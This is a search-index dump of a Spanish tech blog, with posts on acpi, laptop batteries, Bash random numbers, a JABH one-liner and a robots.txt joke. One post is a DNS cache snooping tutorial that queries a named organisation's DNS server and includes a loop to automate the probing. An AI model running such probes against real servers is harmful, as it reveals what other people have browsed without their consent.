adapter information -t, --thermal thermal information -c, --cooling cooling information -V, --everything show every device, overrides above options -s, --show-empty show non-operational devices -f, --fahrenheit use fahrenheit as the temperature unit -k, --kelvin use kelvin as the temperature unit -d, --directory path to ACPI info (/sys/class resp. /proc/acpi) -p, --proc use old proc interface instead of new sys interface -h, --help display this help and exit -v, --version output version information and exit By default, acpi displays information on installed system batteries. Non-operational devices, for example empty battery slots are hidden. The default unit of temperature is degrees celsius. Report bugs to Michael Meskes . $ acpi Battery 0: Charging, 38%, 00:28:05 until charged $ acpi -a Adapter 0: on-line Con acpi también podemos controlar la temperatura.\n$ acpi -t Thermal 0: ok, 58.0 degrees C Thermal 1: ok, 60.0 degrees C Thermal 2: ok, 72.0 degrees C ","permalink":"http://karpoke.ignaciocano.com/2010/09/26/la-bateria-del-portatil/","summary":"\u003cp\u003eAlgunos \u003ca href=\"http://www.macoteca.com/falsos-mitos-de-las-baterias/90/\"\u003efalsos mitos de las baterías del portátil\u003c/a\u003e:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eEs necesario que se agote la batería para ponerla a cargar,\u003c/li\u003e\n\u003cli\u003eno se debe dejar el portátil siempre enchufado a la corriente,\u003c/li\u003e\n\u003cli\u003eni se debe suspender conectado a la corriente.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eTambién existen técnicas para \u003ca href=\"http://www.macoteca.com/rejuvenece-la-bateria-de-tu-portatil/94/\"\u003ealargar la vida de la batería\u003c/a\u003e:\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003eenchufa el portátil (y enciéndelo, si quieres) hasta que la batería\u003c/li\u003e\n\u003c/ol\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eeste cargada y déjalo cargando 2 horas más,\n\u003c/code\u003e\u003c/pre\u003e\u003col start=\"2\"\u003e\n\u003cli\u003edesenchufa el portátil y espera a que se gaste la batería e hiberne\u003c/li\u003e\n\u003cli\u003eenchufa el portátil sin encenderlo hasta que se cargue la batería\u003c/li\u003e\n\u003cli\u003erealizar estas operaciones cada 2 ó 3 meses\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp\u003eEn principio, las baterías de los portátiles \u003cem\u003eya\u003c/em\u003e incorporan un\nmecanismo que corta la corriente cuando éstas están totalmente cargadas,\nevitando así la fatiga por la carga continua.\u003c/p\u003e","title":"La batería del portátil"},{"content":"DNS Cache Snooping consiste en realizar una serie de peticiones de resolución de nombres de dominio a la caché de un servidor DNS, con la finalidad de conocer si los usuarios de ese servidor han visitado esos dominios. Hay que tener en cuenta que las entradas en la caché tienen un tiempo de caducidad, y si durante ese tiempo no ha habido una petición a un dominio, éste es eliminado.\nPara conocer qué servidores DNS hay bajo un dominio:\n$ nslookup -type=ns google.com Server: 192.168.1.1 Address: 192.168.1.1#53 Non-authoritative answer: google.com nameserver = ns2.google.com. google.com nameserver = ns1.google.com. google.com nameserver = ns4.google.com. google.com nameserver = ns3.google.com. Authoritative answers can be found from: ns4.google.com internet address = 216.239.38.10 ns1.google.com internet address = 216.239.32.10 ns3.google.com internet address = 216.239.36.10 ns2.google.com internet address = 216.239.34.10 Del resultado, nos interesará los que vienen identificados como nameserver, por ejemplo, ns1.google.com.\nPara saber si algún usuario que realiza las peticiones de resolución de nombres a este DNS ha visitado una página concreta, por ejemplo yahoo.com:\n$ nslookup -type=a -norecurse yahoo.com ns1.google.com Server: ns3.google.com Address: 216.239.36.10#53 ** server can’t find yahoo.es: REFUSED En este caso, Google bloquea este tipo de peticiones. Probemos con el servidor DNS de otro dominio:\n$ nslookup -type=a -norecurse yahoo.com ns1.renfe.es Server: ns1.renfe.es Address: 213.144.33.254#53 Non-authoritative answer: _*_ Can’t find yahoo.com: No answer Este servidor sí ha respondido: nadie ha visitado yahoo.com, al menos en el tiempo de caducidad de una entrada en la caché del servidor DNS. Hacemos una prueba más:\n$ nslookup -type=a -norecurse google.com ns1.renfe.es Server: ns1.renfe.es Address: 213.144.33.254#53 Non-authoritative answer: Name: google.com Address: 74.125.39.106 Name: google.com Address: 74.125.39.147 Name: google.com Address: 74.125.39.99 Name: google.com Address: 74.125.39.103 Name: google.com Address: 74.125.39.104 Name: google.com Address: 74.125.39.105 Ahora sí, vemos que google.com sí ha sido visitado.\nVamos a automatizar el proceso de comprobación de cada página en el script dns-cache-snooping.sh. Primero, supongamos que tenemos un fichero con una lista de páginas a comprobar. La metemos en una lista:\n$ urls=() $ f=\u0026#34;sites.txt\u0026#34; $ if [ -r $f ]; then \u0026gt; while read line; do \u0026gt; urls+=( $line ) \u0026gt; done \u0026gt; \u0026#34;$f\u0026#34; \u0026gt; fi Recorrermos la lista realizando las peticiones y mostrando el resultado en verde o rojo, según si ha sido encontrada la página en la caché o no:\n$ ns=ns1.renfe.es $ for url in ${urls[*]}; do \u0026gt; if [ -n \u0026#34;$(nslookup -type=a -norecurse $url $ns | grep \u0026#39;Name:\u0026#39;)\u0026#34; ]; then \u0026gt; echo $url \u0026gt; fi \u0026gt; done » Inspirado en un artículo de El maligno » Más información: DNS Cache Snooping\n","permalink":"http://karpoke.ignaciocano.com/2010/09/25/bash-dns-cache-snooping/","summary":"\u003cp\u003e\u003cstrong\u003eDNS Cache Snooping\u003c/strong\u003e consiste en realizar una serie de peticiones de\nresolución de nombres de dominio a la caché de un servidor DNS, con la\nfinalidad de conocer si los usuarios de ese servidor han visitado esos\ndominios. Hay que tener en cuenta que las entradas en la caché tienen un\ntiempo de caducidad, y si durante ese tiempo no ha habido una petición a\nun dominio, éste es eliminado.\u003c/p\u003e","title":"Bash DNS Cache Snooping"},{"content":" \u0026ldquo;Los números aleatorios no deberían ser generados por un método elegido aleatoriamente\u0026rdquo;. Donald E. Knuth\nEn Bash, podemos obtener números enteros aleatorios:\n$ echo $RANDOM 20684 Cada vez que se referencia el parámetro RANDOM, éste devuelve un valor entre 0 y 32767, es decir, 2^15^-1. Podemos inicializar la secuencia de números aleatorios asignando un valor a RANDOM. Debemos tener en cuenta que si le asignamos un valor vacío a RANDOM se pierden sus propiedades especiales, aunque después lo inicialicemos.\nPodemos poner a prueba la calidad de esos números aleatorios:\n$ a=() $ freq=10 $ max=327680 $ for ((i=0; i \u0026lt; $max; i++)); do \u0026gt; # progress bar \u0026gt; test $((i%($max/$freq))) -eq 0 \u0026amp;\u0026amp; echo -n \u0026#34;.\u0026#34; \u0026gt; j=$RANDOM \u0026gt; a[$j]=$((a[$j]+1)) \u0026gt; done $ for ((i=0; i \u0026lt; $max/$freq; i++)); do \u0026gt; echo \u0026#34;$i: ${a[$i]}\u0026#34;; \u0026gt; done | less Más números Podemos obtener el módulo aleatorio de un número aleatorio.\n$ echo $((RANDOM%RANDOM)) 4530 ¿Afectará de alguna manera realizar el módulo aleatorio sobre un número aleatorio como variable aleatoria?\nSí, ya que en el mejor caso, el módulo será mayor que el primer número y, por lo tanto, no afecta al resultado. Pero en el peor caso, el módulo será menor que el primer número, con lo que es mayor la probabilidad de obtener un número menor.\n$ a=() $ freq=10 $ max=327680 $ for ((i=0; i \u0026lt; $max; i++)); do \u0026gt; # progress bar \u0026gt; test $((i%($max/$freq))) -eq 0 \u0026amp;\u0026amp; echo -n \u0026#34;.\u0026#34; \u0026gt; j=$((RANDOM%RANDOM)) \u0026gt; a[$j]=$((a[$j]+1)) \u0026gt; done $ for ((i=0; i \u0026lt; $max/$freq; i++)); do echo \u0026#34;$i: ${a[$i]}\u0026#34;; done Números aleatorios binarios, octales y hexadecimales:\n$ b=2 $ for ((i=0; i \u0026lt; RANDOM%RANDOM; i=i+RANDOM%b)); do echo -n $((i%b)); done 000010001111101001010001111101001011111 $ b=8 $ for ((i=0; i \u0026lt; RANDOM%RANDOM; i=i+RANDOM%b)); do echo -n $((i%b)); done 04743654506265435353610222054150 $ a=\u0026#34;01234566789ABCDEF\u0026#34; $ for ((i=0; i \u0026lt; RANDOM%RANDOM; i++ )); do echo -n ${a:$RANDOM%${#a}:1}; done 0150633894AD8DEF81671B06694C6B5 Debemos tener en cuenta que si queremos utilizar estos números, el prefijo, en Bash, para los números binarios es 2#, para los números octales es 0 y para los números hexadecimales, 0x. Por ejemplo, el número 10 es 2#1010, 012 y 0x10.\nY letras Podemos crear una secuencia de números y letras aleatoria:\n$ a=$(echo $((echo -n {a..z}; echo -n {A..Z}; echo -n {0..9};) | sed \u0026#39;s/ //g\u0026#39;)) $ for ((i=0; i \u0026lt; RANDOM%RANDOM; i++)); do echo -n ${a:$RANDOM%${#a}:1}; done 3keV1cLFGdxO2S5nvJGzoq9EyZeryLjkVgP64Dn0z Fuentes de aleatoriedad /dev/random /dev/urandom /proc/interrupts Los dos primeros son ficheros especiales que permiten acceso al generador de números aleatorios del kernel. El kernel recoge ruido ambiental desde los controladores de dispositivos (como por ejemplo, el ratón) y otras fuentes y lo usa como fuente de aleatoriedad. También tiene en cuenta el número de bits que se pueden crear aleatoriamente con un nivel de entropía tal que no sean vulnerables a ataques criptográficos. /dev/random se debería utilizar para crear claves criptográficas, para todo lo demás, podemos usar /dev/urandom.\nEstas fuentes proporcionan bits aleatorios, no caracteres, por lo que antes de utilizarlos para mostrar una cadena de caracteres deberemos pasarlos por alguna función como:\nmd5sum shasum sha1sum sha224sum sha256sum sha384sum sha512sum grep -o '[[:alnum:]]' tr -dc a-zA-Z0-9 xxd -ps od -An -td | sed 's/\\s_\\(._\\)\\s/\\1/g' o cualquier otra combinación que filtre los caracteres /proc/interrupts registra el número de interrupciones de cada dispotivo de entrada/salida, por lo que debería funcionar bien como fuente de aleatoriedad.\nCadenas de caracteres aleatorios:\n$ strings /dev/urandom | grep -o \u0026#39;[[:alnum:]]\u0026#39; | head -n 12 | tr -d \u0026#39;\\n\u0026#39;; echo tUqWq9fqem9C1gKbTpCcVJg6DNvxMG $ \u0026lt; /dev/urandom tr -dc _a-zA-Z0-9 | head -c12 1G0gNNXM3RkT $ dd if=/dev/random bs=1 count=5 2\u0026gt;/dev/null | xxd -ps 3e3206ff95 Generando entropía Si la fuente de entropía no da abasto y necesitamos generar más entropía más rápido, por ejemplo, cuando creamos claves RSA muy largas, poner a trabajar el equipo podría servir. Algo como:\n$ ls -lRh / $ find / -name \\* Sin embargo, existe un programa que sirve para esto. rng-tools ayuda a generar entropía. Una vez instalado desde los respositorios, modificamos el fichero /etc/default/rng-tools para que contenga:\nHRNGDEVICE=/dev/urandom Y reiniciamos el servicio:\n$ sudo service rng-tools restart Si ahora volvemos a crear una clave, notaremos que el tiempo necesario para conseguir la entropía necesaria es mucho menor.\nActualizado el 25 de septiembre de 2016 Otro servicio que sirve para esto es haveged:\nsystemctl enable haveged systemctl start haveged Otros programas Podemos instalar estos programas desde los repositorios.\nmakepasswd Para crear contraseñas.\n$ makepasswd --char=12 mkpasswd Otro para crear contraseñas.\n$ mkpasswd openssl Permite obtener una serie de bytes hexadecimales aleatorios; por cada byte hexadecimal se imprimen dos caracteres hexadecimales:\n$ openssl rand -hex 16 5666b2215534c6d4c3be4101219cd0b1 También permite obtener caracteres en base64:\n$ openssl rand -base64 12 ymwU0wtOZ6wMgAfr pwgen Otro más para crear contraseñas\n$ pwgen 12 rand Trabaja con números y caracteres. Por ejemplo, podemos obtener números decimales aleatorios.\n$ rand -f 0.04691 No sólo letras y números Podemos crear una dirección MAC aleatoria:\n$ echo $(cat /proc/interrupts | md5sum | sed -r \u0026#39;s/^(.{10}).*$/00\\1/; s/([0-9a-f]{2})/\\1:/g; s/:$//;\u0026#39;) 00:6d:b6:2f:46:1d $ openssl rand -hex 6 | sed -r \u0026#39;s/^(.{10}).*$/00\\1/; s/([0-9a-f]{2})/\\1:/g; s/:$//;\u0026#39; 00:8d:e6:98:ca:d2 Podemos crear un fichero o un directorio temporal, cuyo nombre es aleatorio:\n$ mktemp /tmp/tmp.WBABktXDHZ $ mktemp -d /tmp/tmp.lHuPARC0YC Podemos mostrar un fichero aleatorio:\n$ find ~ -maxdepth 1 | shuf -n1 --random-source=/dev/random ./bash_aliases Podemos poner una imagen de fondo de escritorio aleatoria en Gnome:\n$ f=$(find ~/Imágenes/ | shuf -n1 | egrep \u0026#39;gif|jpe?g|png\u0026#39;) $ while test -n \u0026#34;$f\u0026#34;; do f=$(find ~/Imágenes/ | shuf -n1); done $ gconftool-2 -t str --set /desktop/gnome/background/picture_filename \u0026#34;$f\u0026#34; Podemos generar una contraseña a partir de 4 palabras aleatorias:\n$ printf \u0026#39;%s %s %s %s\u0026#39; $(\\grep -v \u0026#34;\u0026#39;\u0026#34; /usr/share/dict/american-english | shuf -n 4 | tr \u0026#39;[:upper:]\u0026#39; \u0026#39;[:lower:]\u0026#39;) meters haven backtracking subordinates Podemos mostrar una línea aleatoria de un fichero:\n$ shuf -n1 /etc/passwd O también podemos mostrar un número de líneas aleatorio de un archivo aleatorio del código fuente de Linux:\n$ f=$(find /usr/src/linux-source-2.6.32 -type f -name \\* | shuf -n1) $ n=$(wc -l $f | awk \u0026#39;{print $1}\u0026#39;) $ cat $f | sed -n $((RANDOM%n)),$((RANDOM%n))p if (!zalloc_cpumask_var(\u0026amp;vec-\u0026gt;mask, gfp)) goto cleanup; } for_each_possible_cpu(i) cp-\u0026gt;cpu_to_pri[i] = CPUPRI_INVALID; return 0; cleanup: for (i--; i \u0026gt;= 0; i--) free_cpumask_var(cp-\u0026gt;pri_to_cpu[i].mask); return -ENOMEM; } Internet En Internet, hay servicios cuyas respuestas aleatorias podemos utilizar en nuestra vida cotidiana:\nObtener una excusa de BOFH aleatoria:\n$ telnet towel.blinkenlights.nl 666 === The BOFH Excuse Server === We didn\u0026#39;t pay the Internet bill and it\u0026#39;s been cut off. Obtener un hecho aleatorio:\n$ curl -s http://randomfunfacts.com | grep -Eo \u0026#34;.*\u0026#34; | sed -r \u0026#39;s/([^\u0026lt; ]+)\u0026lt;\\/i\u0026gt;\u0026lt; \\/strong\u0026gt;/\\1/\u0026#39; Donkeys kill more people annually than plane crashes. Obtener un mensaje aleatorio para un commit:\n$ curl -s http://whatthecommit.com | grep \u0026#34;\u0026#34; | sed -r \u0026#39;s/([^$]+)$/\\1/\u0026#39; Fucking egotistical bastard. adds expandtab to vimrc Obtener una frase de Futurama aleatoria desde Slashdot:\n$ curl -Is slashdot.org | sed -n \u0026#39;5p\u0026#39; | sed \u0026#39;s/^X-//\u0026#39; Bender: I\u0026#39;m one of those lazy, homeless bums I\u0026#39;ve been hearing about. Obtener una excusa de programador aleatoria:\ncurl -s https://api.githunt.io/programmingexcuses Además de números y letras, también podemos obtener números de lotería, imágenes, secuencias, fechas, horas, coordenadas geográficas, música, testimonios\u0026hellip; todo aleatorio en random.org\n$ curl -s \u0026#34;https://www.random.org/passwords/?num=1\u0026amp;len=8\u0026amp;format=html\u0026amp;rnd=new\u0026#34; Imágenes: xkcd, dilbert\nComandos relacionados con la aleatoriedad en commandlinefu\n","permalink":"http://karpoke.ignaciocano.com/2010/09/25/random-bash/","summary":"\u003cblockquote\u003e\n\u003cp\u003e\u003cem\u003e\u0026ldquo;Los números aleatorios no deberían ser generados por un método\nelegido aleatoriamente\u0026rdquo;. \u003cem\u003eDonald E. Knuth\u003c/em\u003e\u003c/em\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003eEn Bash, podemos obtener números enteros \u003ca href=\"http://es.wikipedia.org/wiki/Aleatoriedad\"\u003ealeatorios\u003c/a\u003e:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ echo $RANDOM\n20684\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003e\u003cimg alt=\"Random number\" loading=\"lazy\" src=\"/images/random_number-300x107.jpg\"\u003e\u003c/p\u003e\n\u003cp\u003eCada vez que se referencia el parámetro \u003ca href=\"http://linux.die.net/man/1/bash\"\u003eRANDOM\u003c/a\u003e, éste devuelve un\nvalor entre 0 y 32767, es decir, 2^15^-1. Podemos inicializar la\nsecuencia de números aleatorios asignando un valor a RANDOM. Debemos\ntener en cuenta que si le asignamos un valor vacío a RANDOM se pierden\nsus propiedades especiales, aunque después lo inicialicemos.\u003c/p\u003e","title":"Random Bash"},{"content":"Se le llama JAPH a un programa en Perl que escribe \u0026ldquo;Just another Perl hacker,\u0026rdquo;. JABH vendría a ser algo parecido, en Bash:\n$ s=\u0026#34;Jaescunrhkso ettBhr haa,\u0026#34;;for y in {0..4};do for x in {0..4};do echo -n \u0026#34;${s:$((5*x+y)):1}\u0026#34;;done;done Just another Bash hacker, Otra versión, algo más críptica:\n$ s=\u0026#34;Jaescunrhkso ettBhr haa,\u0026#34;;t=4;f(){ eval \u0026#34;for $1 in {0..$t};do eval $2;done;\u0026#34;;};f x \u0026#39;;f y \u0026#34;echo -n \\\u0026#34;\u0026#39;\\\u0026#39;\u0026#39;\\${s:\\$(((t+1)*y+x)):1}\u0026#39;\\\u0026#39;\u0026#39;\\\u0026#34;\u0026#34;\u0026#39; Just another Bash hacker, ","permalink":"http://karpoke.ignaciocano.com/2010/07/28/jabh/","summary":"\u003cp\u003eSe le llama \u003ca href=\"http://en.wikipedia.org/wiki/Just_another_Perl_hacker\"\u003eJAPH\u003c/a\u003e a un programa en Perl que escribe \u0026ldquo;Just another\nPerl hacker,\u0026rdquo;. JABH vendría a ser algo parecido, en Bash:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ s=\u0026#34;Jaescunrhkso  ettBhr haa,\u0026#34;;for y in {0..4};do for x in {0..4};do echo -n \u0026#34;${s:$((5*x+y)):1}\u0026#34;;done;done\nJust another Bash hacker,\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eOtra versión, algo más críptica:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ s=\u0026#34;Jaescunrhkso  ettBhr haa,\u0026#34;;t=4;f(){ eval \u0026#34;for $1 in {0..$t};do eval $2;done;\u0026#34;;};f x \u0026#39;;f y \u0026#34;echo -n \\\u0026#34;\u0026#39;\\\u0026#39;\u0026#39;\\${s:\\$(((t+1)*y+x)):1}\u0026#39;\\\u0026#39;\u0026#39;\\\u0026#34;\u0026#34;\u0026#39;\nJust another Bash hacker,\n\u003c/code\u003e\u003c/pre\u003e","title":"JABH - Just Another Bash Hacker"},{"content":"Si Skynet no tomó conciencia de sí mismo el 29 de agosto de 1997, seguro que fue gracias a que existen desarrolladores precavidos, como los de last.fm, que añaden al robots.txt las siguientes líneas:\nDisallow: /harming/humans Disallow: /ignoring/human/orders Disallow: /harm/to/self » barrapunto\n","permalink":"http://karpoke.ignaciocano.com/2010/07/28/antes-de-que-los-robots-dominaran-el-planeta/","summary":"\u003cp\u003eSi \u003ca href=\"http://es.wikipedia.org/wiki/Skynet_(Terminator)\"\u003eSkynet\u003c/a\u003e no tomó conciencia de sí mismo el 29 de agosto de 1997,\nseguro que fue gracias a que existen desarrolladores precavidos, como\nlos de \u003ca href=\"http://www.last.fm/robots.txt\"\u003elast.fm\u003c/a\u003e, que añaden al \u003ccode\u003erobots.txt\u003c/code\u003e las siguientes líneas:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eDisallow: /harming/humans\nDisallow: /ignoring/human/orders\nDisallow: /harm/to/self\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003e\u003cimg alt=\"Terminator Arm\" loading=\"lazy\" src=\"/images/terminator_sideshow_endo_arm-208x300.jpg\"\u003e\u003c/p\u003e\n\u003cp\u003e» \u003ca href=\"http://barrapunto.com/article.pl?sid=10/07/28/0910235\"\u003ebarrapunto\u003c/a\u003e\u003c/p\u003e","title":"Antes de que los robots dominaran el planeta"},{"content":"Lo siento, la página que estás buscando no existe.\nEl motivo podría ser un error en la dirección o un enlace anticuado.\nPuedes utilizar el buscador o volver a la página de inicio.\n","permalink":"http://karpoke.ignaciocano.com/404.html","summary":"\u003cp\u003eLo siento, la página que estás buscando no existe.\u003c/p\u003e\n\u003cp\u003eEl motivo podría ser un error en la dirección o un enlace anticuado.\u003c/p\u003e\n\u003cp\u003ePuedes utilizar el \u003ca href=\"/search/\"\u003ebuscador\u003c/a\u003e o volver a la \u003ca href=\"/\"\u003epágina de inicio\u003c/a\u003e.\u003c/p\u003e","title":"404 - Página no encontrada"},{"content":"Hola, soy Nacho Cano 👋 Bienvenido a mi blog técnico.\n¿Qué encontrarás aquí? En este blog escribo sobre:\nDesarrollo web: Frameworks modernos, mejores prácticas y arquitecturas Python: Desde fundamentos hasta temas avanzados DevOps: CI/CD, contenedores, automatización Bases de datos: Optimización, modelado, NoSQL vs SQL Experiencias técnicas: Soluciones a problemas reales Contacto Puedes encontrarme en:\nGitHub: @karpoke Email: Disponible próximamente Última actualización: Febrero 2026\n","permalink":"http://karpoke.ignaciocano.com/who-am-i/","summary":"\u003ch2 id=\"hola-soy-nacho-cano-\"\u003eHola, soy Nacho Cano 👋\u003c/h2\u003e\n\u003cp\u003eBienvenido a mi blog técnico.\u003c/p\u003e\n\u003ch2 id=\"qué-encontrarás-aquí\"\u003e¿Qué encontrarás aquí?\u003c/h2\u003e\n\u003cp\u003eEn este blog escribo sobre:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDesarrollo web\u003c/strong\u003e: Frameworks modernos, mejores prácticas y arquitecturas\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePython\u003c/strong\u003e: Desde fundamentos hasta temas avanzados\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDevOps\u003c/strong\u003e: CI/CD, contenedores, automatización\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eBases de datos\u003c/strong\u003e: Optimización, modelado, NoSQL vs SQL\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eExperiencias técnicas\u003c/strong\u003e: Soluciones a problemas reales\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"contacto\"\u003eContacto\u003c/h2\u003e\n\u003cp\u003ePuedes encontrarme en:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eGitHub\u003c/strong\u003e: \u003ca href=\"https://github.com/karpoke/\"\u003e@karpoke\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eEmail\u003c/strong\u003e: Disponible próximamente\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003cp\u003e\u003cem\u003eÚltima actualización: Febrero 2026\u003c/em\u003e\u003c/p\u003e","title":"Who am I?"}]